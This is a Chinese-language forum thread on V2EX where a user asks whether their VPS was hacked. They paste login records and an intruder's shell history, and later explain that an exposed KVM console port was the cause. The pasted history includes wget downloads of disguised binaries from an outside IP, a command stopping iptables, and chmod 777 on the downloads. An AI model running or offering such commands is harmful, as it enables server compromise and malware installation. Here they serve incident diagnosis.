V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
rhwood
V2EX  ›  问与答

是不是被黑了

  •  
  •   rhwood · 2015-04-30 00:37:06 +08:00 · 2722 次点击
    这是一个创建于 3503 天前的主题,其中的信息可能已经有所发展或是发生改变。

    一台vps无故down了,重启后发现...

    who /var/log/wtmp:
    butten tty1 2015-04-29 23:59
    root pts/0 2015-04-30 00:01 (lz的ip)
    butten tty1 2015-04-30 00:01
    butten tty1 2015-04-30 00:02
    butten tty1 2015-04-30 00:16

    su - butten
    history:
    311 2015-04-30 00:01:30 w
    312 2015-04-30 00:01:35 clear
    313 2015-04-30 00:01:36 w
    314 2015-04-30 00:01:47 exit
    315 2015-04-30 00:02:29 clear
    316 2015-04-30 00:02:31 cat /etc/passwd
    317 2015-04-30 00:02:39 clear
    318 2015-04-30 00:02:40 w
    319 2015-04-30 00:02:45 clear
    320 2015-04-30 00:02:46 w
    321 2015-04-30 00:02:48 ls
    322 2015-04-30 00:02:51 cd /usr/bin
    323 2015-04-30 00:02:52 wget
    324 2015-04-30 00:03:03 wget http://222.186.52.66:1112/java-jdk
    325 2015-04-30 00:03:16 service iptables stop
    326 2015-04-30 00:03:37 wget http://222.186.52.66:1112/java-jdk
    327 2015-04-30 00:04:25 wget http://222.186.52.66:1112/syslogd
    328 2015-04-30 00:06:16 chmod 777 syslogd
    329 2015-04-30 00:06:16 w
    330 2015-04-30 00:06:19 clear
    331 2015-04-30 00:06:23 chmod 777 java-jdk
    332 2015-04-30 00:06:26 chmod 777 syslogd
    333 2015-04-30 00:08:31 w
    334 2015-04-30 00:08:36 clear
    335 2015-04-30 00:08:37 w
    336 2015-04-30 00:08:38 clear
    337 2015-04-30 00:08:40 ps -ef
    338 2015-04-30 00:08:44 clear
    339 2015-04-30 00:08:45 ss
    340 2015-04-30 00:08:53 clear
    341 2015-04-30 00:08:55 exit

    这个butten发帖的时候还在tty1...

    8 条回复    2017-02-16 12:22:12 +08:00
    scys
        1
    scys  
       2015-04-30 00:51:32 +08:00
    yes
    rhwood
        2
    rhwood  
    OP
       2015-04-30 00:53:37 +08:00
    为什么butten可以从tty1登录?好像踢不掉。。。
    xiaozhizhu1997
        3
    xiaozhizhu1997  
       2015-04-30 08:48:08 +08:00 via Android
    又见222.186.*.*
    镇江机房尼玛真是黑窝啊
    chimon
        4
    chimon  
       2015-04-30 10:25:16 +08:00
    诶!!遇到老乡mark一下~
    Dk2014
        5
    Dk2014  
       2015-04-30 11:29:06 +08:00 via Android
    吓的我去看了下
    没发现其他用户和其他ip登录的记录
    _(:з」∠)_
    hadoop
        6
    hadoop  
       2017-02-15 19:56:19 +08:00 via Android
    lz 找到从 tty1 登录原因了吗?我今天也遇到了
    rhwood
        7
    rhwood  
    OP
       2017-02-16 10:14:26 +08:00
    @hadoop kvm 母鸡忘了配置防火墙规则,导致 console 端口被暴露在公网了,扫到端口后可以通过 vps 的单用户模式登陆到 tty1 ,后来改了防火墙规则,给 vps 单用户名模式加了密码后就没再发生了。
    hadoop
        8
    hadoop  
       2017-02-16 12:22:12 +08:00
    @rhwood vps 单用户模式是啥意思?直接得到 root 权限?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2626 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 38ms · UTC 11:09 · PVG 19:09 · LAX 03:09 · JFK 06:09
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.